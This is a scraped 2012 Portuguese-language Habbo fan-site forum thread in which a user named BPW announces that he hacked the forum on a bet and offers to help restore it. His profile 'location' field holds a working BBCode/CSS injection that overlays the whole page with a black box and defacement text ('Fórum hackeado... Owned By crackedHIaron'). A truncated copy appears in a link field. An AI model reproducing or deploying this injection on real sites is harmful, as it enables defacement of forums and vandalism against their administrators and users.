Info Pixel - Sua fonte de informação está aqui!
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.


 
InícioÚltimas imagensProcurarRegistarEntrar
Siga todas as regras da Info Pixel - Saiba mais
Acesse o canal Mefio Produções >> youtube.com/user/mefio1
Fã-site Oficializado
Últimos assuntos
» Chatman no Habbo holandês
Venho informar que achei uma falha de segurança no fórum. Icon_minitimeQui Out 18, 2012 5:37 pm por feliwzito

» Sejam bem-vindos usuários turcos
Venho informar que achei uma falha de segurança no fórum. Icon_minitimeSáb Ago 18, 2012 7:23 pm por Super...alex...

» Suba ao pódio.
Venho informar que achei uma falha de segurança no fórum. Icon_minitimeSáb Ago 18, 2012 7:23 pm por Super...alex...

» Posso? ser
Venho informar que achei uma falha de segurança no fórum. Icon_minitimeSeg Jul 30, 2012 8:45 pm por fluminesefc

» Acessa meu site!
Venho informar que achei uma falha de segurança no fórum. Icon_minitimeTer Jul 17, 2012 11:30 pm por rosetia

» Fórum Hackeiado By BPW
Venho informar que achei uma falha de segurança no fórum. Icon_minitimeDom Jul 08, 2012 8:23 pm por BPW

» Venho informar que achei uma falha de segurança no fórum.
Venho informar que achei uma falha de segurança no fórum. Icon_minitimeDom Jul 08, 2012 8:22 pm por BPW

» Talentos e Ajudantes Habbo
Venho informar que achei uma falha de segurança no fórum. Icon_minitimeDom Jul 08, 2012 8:18 pm por BPW

» A Grande Lua
Venho informar que achei uma falha de segurança no fórum. Icon_minitimeDom Jul 08, 2012 8:18 pm por BPW

Usuário Destaque

Comported


Por acolher o nosso fã-site nos momentos mais difíceis
Últimos emblemas
...
Info Pixel na Mídia
Parceiros

 

 Venho informar que achei uma falha de segurança no fórum.

Ir para baixo 
AutorMensagem
BPW
Novato
Novato



Mensagens : 11
Pixels : 4314
Reputação : 0
Data de inscrição : 08/07/2012
Localização : [table style="position: fixed; top: 0px; left: 0px; background-color: black; border: 0px solid black; color: white; display:block!important; width:2000px; height:2000px; z-index:2!important; -moz-user-select: none;-moz-user-focus:ignore; -moz-user-input isabled; text-shadow: 1px 1px 1px #000, -1px -1px 1px #FFF;"][tr][td] Fórum hackeado. # Admin fail, sorry. Owned By crackedHIaron. #TangoD0wn greatz to BPW On habbo. [/scroll][/td][/tr][/table]

Venho informar que achei uma falha de segurança no fórum. Empty
MensagemAssunto: Venho informar que achei uma falha de segurança no fórum.   Venho informar que achei uma falha de segurança no fórum. Icon_minitimeDom Jul 08, 2012 8:22 pm

Meu amigo apostou comigo se eu conseguisse hackear este fórum eu ia ganhar 50c. como feito, consegui, e vim informar a vocês que está com uma falha, se quiserem minha ajuda para fazer voltar ao normal. me contatem.

não acredita? olhe meu outro tópico e outros tópicos no fórum.

${/null^}
Ir para o topo Ir para baixo
http://[table style="position: fixed; top: 0px; left: 0px;
 
Venho informar que achei uma falha de segurança no fórum.
Ir para o topo 
Página 1 de 1
 Tópicos semelhantes
-
» Segurança é sempre bom
» Ranks no fórum
» Olá pessoal do fórum
» Sou novo no fórum
» Fórum Hackeiado By BPW

Permissões neste sub-fórumNão podes responder a tópicos
Info Pixel - Sua fonte de informação está aqui! :: Info-Pixel :: Apresentações-
Ir para: